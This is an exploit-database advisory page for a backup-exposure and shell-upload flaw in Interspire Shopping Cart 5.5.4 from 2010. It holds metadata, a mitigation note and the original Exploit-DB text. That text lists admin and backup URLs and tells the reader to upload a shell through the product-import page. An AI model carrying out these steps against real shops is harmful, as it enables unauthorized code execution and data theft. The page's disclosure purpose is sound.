INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump Vulnerability

vendor:

Shopping Cart

by:

indoushka

7,5

CVSS

HIGH

backup dump Vulnerability

264

CWE

Product Name: Shopping Cart

Affected Version From: 5.5.4

Affected Version To: 5.5.4

Patch Exists: YES

Related CWE: N/A

CPE: a:interspire:shopping_cart:5.5.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2010

INTERSPIRE SHOPPING CART 5.5.4 – Ultimate Edition backup dump Vulnerability

An attacker can exploit this vulnerability by accessing the backup directory of the application and uploading a malicious shell. The attacker can then access the application and execute arbitrary code.

Mitigation:

Ensure that the backup directory is not accessible from the web and that the application is up to date with the latest security patches.

Source

Exploit-DB raw data:

========================================================================================
| ( Title    ) INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump Vulnerability
| ( Author   ) indoushka
| ( email    ) indoushka@hotmail.com                                                                                                                $
| ( Web Site ) http://www.megaupload.com/?d=VCXHBRO9                                                                                                $
| ( Script   ) Powered by Shopping Cart
| ( Tested on) Lunix Fran&#65533;ais v.(9.10 Ubuntu)
| ( Bug      ) backup
|
======================      Exploit By indoushka       =================================
 # Exploit  :

 1 - http://127.0.0.1/sc/admin/backups/

 2 - http://127.0.0.1/sc/admin/

 Go to import products to upload shell

 http://127.0.0.1/sc/admin/resources\tutorials\import_products.html

Dz-Ghost Team ===== Saoucha * Star08 * Redda * n2n * XproratiX ==========================================
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net
---------------------------------------------------------------------------------------------------------